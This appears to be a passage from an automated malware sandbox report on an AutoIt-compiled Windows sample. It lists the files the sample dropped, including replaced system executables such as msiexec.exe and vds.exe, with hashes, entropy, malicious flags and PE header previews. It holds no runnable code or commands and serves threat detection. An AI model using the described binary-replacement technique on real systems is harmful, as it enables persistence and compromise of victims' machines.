                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BBFE5170EC54B94959676DD457C8EADD7D8AF13F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4FC2D7CE81F8B9CAC18F7CE472DC75B5EACA8F82E2BC944B3EF7956E64D9EE8B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:51B6FD36588BC9BB99942C4A00DB945C9B58C5A878D706F22F4BE4600C9BC2AEC3FAF86DF4A89B1B98840F0AAFD8EFC25B4B991E90D4AE1A10CCA357C58C503A
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ......^ ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1633170301696785
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:7EP3R6KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:A6KsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:35184A2F5B6B06D8E814BA39A601EA5C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:616A2EAED4BEC88DB058DB6BF1552E7AD010F804
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:307FBCA352E1C14D93C21D755C1F4AD13AED9B157E768B89653730C5E4EEF253
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:267FDCCAD4231B6F158D9D5EE53B5C00A9F7E8B50C0648B65DAA5A12BB66B5FB942EAA943CB36A363BD39326122AF3AB3377EE1AEFD94B8EB6E4A7829E8E4DAD
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Roaming\cfd441acea3434e2.bin

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.986164499471079
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:fA0qHKDPINMlxfvoJomwkNJE5Qwh9SZKS3MW7AaM7:I0qHKcNwxfAJo1krEOWSZKuMWR6
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36AA8CBAA7D84D85D44BD1345F338C74
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1368A38874DEC7A036C3617C048F0B1391B0623F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D78360D7987C18D4CFAAD273E67D48AAE14967594AC74E2D3CC5AC02B08AEB79
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DA6DBF5703E5DA7FE11849013FC0C7495C6C5DFC1F373E963A62E9F0825BD92B439E6E5F11293EE7AC967B721CCE1710FE7E9984DA6DF1914229302CA5DBEEE2
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:..:.............ZH.?..Qo..A...a......(.......8..,1DgF......K..!.4.".6.iEJ`8.1.cdk..........+n............Y.X.$...X..._....xL.k...+..e.........Mb..$.5.^.....SW.b.W.8O..\.x...1...4....[..>.._.....p..V]mM".....^....../..0.6....9jvx..?oZ..4..W.s.G.].* .?..9..|P...ap.}>.......U...x.\.T...E2......b.|..n..Q.P@....."...v...S.W..6.XB...c'+fe^.Y......d....7.......$... ..l......:+&`w...W..]....E....|.....o.........f..?.......C..=..Y....W..Tx=.A.).C...b.,...........R.....#.2..x.p......043.................b>...a.....hF.".-:D=g[)^......._,.e......uD>V..&.......f#..[..<.......+7e.....^K]....'r.$$I..A.W.P.....;.,...{.....~.......'\K..).\.~.|6......[..7.HcO..1.2.....U.6PEs...!..@{Ibi....o..........Y....).{r.....?*..#. ..1.X.e..bBT....9a.'..0p\'bO35.d$;"..t....3.b.0........G.$...+.-O..%.....R.......:b*..l.o{.g....=.S:_HOH<2Y...0.?*...P"@.....:..H.@.\g&....Q%..zx..<+^...4..P.S......1X1L.)F..{.0.,R....X.i....X...D...$...E,Cs..'.+):H.....%>..x!d...#P

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\msdtc.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1278464
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.142977084224839
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:MjkyJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MIyJsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B997E00A6861615E066CA0DA6FBA54A6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CD09A7964ACB6B668337CD1B3933DF89F14534A2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:79D60435826469A9B2FA59FE0F1365B268AF50DC4A09657444187413BBF582DC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C992409CD9ADBBDA4906E373618F31871AB45D387BD00966B146B0AFB200718D372D4EA16BCB8F1F5F029125BFA2F146DD5E5CA646089B6760DE58B3D4BB0278
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.083889667221645
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:44DXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:HXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EF1A1266557C38137083D0B38710C3D1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FF9B259B23BF2FDB1CFCFE636B4A7DE240E5CA40
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0262814A731BA1E1D2D271100BE3E30EA206703F2C2D17D8074B33A674FD8A3A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:34167E25E146FAEFE97EB24FC3CDFF0D0D92897AFE75553AF15A1081006933F5A90E01F4A6E00AB3128F3FF449CBC805B1755E5C668D4EF94B99DB026896C7C8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027570823121208
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:H9TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:579893F6B0B6C9ED87C94C25F4EDC7E0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:542199E1157497391239597732CB73A26183D359
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:093D232FFDE45BFE9D2AE0CA94852FED4B5FEB548C763D8964A13A6B4AC2908E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7DB4957666309D0DE81BC42816A7EE9DA8A8A5D2EEC406A4B7F40FD08D947864824CF36D70E27758344C41D7D5F04204B9115515D329B5C12B9B0D480C24540C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................\..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\vds.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1303552
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.171564843079219
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:ZZ0FxT1UoYr99GdcpK6sqjnhMgeiCl7G0nehbGZpbD:HwWcODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2DBE73EC9F3D022F74934054582A8EBA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ECE2149B4E316BD2620B5CC8B623C0D90FBABD9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D1E9B63814AB2F3E9C342BFD96C237D05966A99AEE4A8CA23B822CE004B8084
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7CFF31DD6D58E04C230BD15827D3EBDBAC9674435E5B5C9901D8E20F770821CF7F6BB0D95B8AB7565420A8EE03EB6081C5C51E596627CDD384675C73CCECF5A3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@............ .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.269293086961545
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wyoKo2fRple9pxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:wyocJApxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F7D150C9FF658CB1BEF82A58FD6540C5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9669450A7B7A8709460867DACBBBE59D691503C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BC0D18BF96708838B4905AA702F096A6CDB05F5619DF8A8B85F120F355B87424
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:40AFB208518A916D821DEBE24918BFB64C4514CCF8459700FA53BC48419BB0E2DDDA9584990462A2AD28BFD421376D9A6195DA352B242D089AC9173C926A55CB
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.....................................A.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2164736
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.062032778087064
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:lWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIK5Dmg27RnWGj:V0zuNIlD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C0B66BD1EE3D66E90E2046376956878E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:30AFFC1D608E028366621BEC3178A6EE2E9D6E5E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CB06B6C19647EC952244FE9AE43EDEF2D20B1F5FE3B18F2359BD5B28EA2396C6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B4AE850D22A02BA417B34339218F21B8012615B73182FA5264C0BD94E8DBC755495F672DBEFC83996BE2D435AF62341589CE39EBA5C545F661CF247750948A2
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....y.!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.09998659877429462
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:sbs1K3l/k/uMclF6vMclFq5zzT1pKlHNOn+SkUeYDwDzym+s1zj:sbEKV/kqF69Fq5zzRetO+pawHym+Ev
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1C1459EF94B259D659C1E2AE9035B73
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E52DC2460560C4B4C859A64E69651A2C966C637A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:285CD4C9D897BC582782CC6A305A31ACBCC1AB23A4544CA68B64583A7F4BAC57
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6CC3021F89896A793E64DAC58FF7675854DE47B8C628026F462B4780009A6F61C262AD59ABEEE9BE11F9B4E4F4A50E64A9F268729DCEF37B187FCD6081CA878C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....`...`.......................................`...!...........................................................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............>AR4./..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.10170015688725025
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:Vl6DLiEKV/kqF69Fq5zzRnTnX+pawHyqLiEn:Vl6DLiz81MnX+pBHyqLic
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8465369A0D518AF138B6B31A66920AAA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2D1E55619753FB0951A4A9C2163E38E4162C3185
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C691C6E9A568831274219BD809DC0775DD6E8B460BDBB9BFDE46ABDE50C7D8D2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0F3FD1E527233E49D3F6AACFBDE8141E812ED2CEA489E1CC5005BA110063191ADCF334A729B538C6C70F1EF5A5A9B8DD14D82AE724B88D07997AC66D3179BA47
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....h...h.......................................h...!...................................y.......................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W................S4./..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.........y...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.09915860906857822
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:u5Gas1K3Nk/uMclF6vMclFq5zzT1pZ+HNIn+SkUeYDwDzyjas1zr:uYaEK9kqF69Fq5zzRf+tI+pawHyjaE3
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DC62B175B2A073AE3CB4EF4CA1A033EF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DC3C1C41AAE4D9B1DDEB9994A3E79055BAA8A8D3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BDE61401CD0D03AF9575CA04D6D86B603CD38319A98EE4636584A0CCA77A5E51
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FE7C6927A0780791019B390882B134ACE89E2FC92064A12DDDE87B5C2E0186DFB6B5F1FF70B1BA57286A49A27C525C3D7BCCADD9B3D3D8FAF9BE21772FA4B268
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....X...X.......................................X...!...........................................................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W................R4./..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              \Device\Null

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):66
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.524640141725149
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

                                                                                                                                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.946127130834606
                                                                                                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                                                                                                                                                                                                                                                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                                                                                              File name:AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File size:5'301'537 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:fe364f6ff698a792c2f9527120136202
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:f3b1c3a44b03ee27911de7a7016ee29865765788
                                                                                                                                                                                                                                                                                                                                                                                                              SHA256:78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA512:a9e1032e27c752460cbeb7e21250525ba6a282407b14aac347808b066969994e1e39e826f88d705a779cad6ee620c44d3cf560ce5d833e658590652f216a40bd
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:f3v+7w8pnbzgN2H+UDPQX8Wy0ARfldMd9wIF7h0oA+InyclI6EhbCXYoVOO:ff+VU2eUDPQX8Wy3RLMd9h90oLqlCZC/
                                                                                                                                                                                                                                                                                                                                                                                                              TLSH:AF362312B3C680B7D8A339752A3FE327AB3575154327C88B97E12E779E11141DB363A2
                                                                                                                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                                                                                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                                                                                                                                                                                              Icon Hash:1733312925935517

                                                                                                                                                                                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint:0x416310
                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint Section:.text
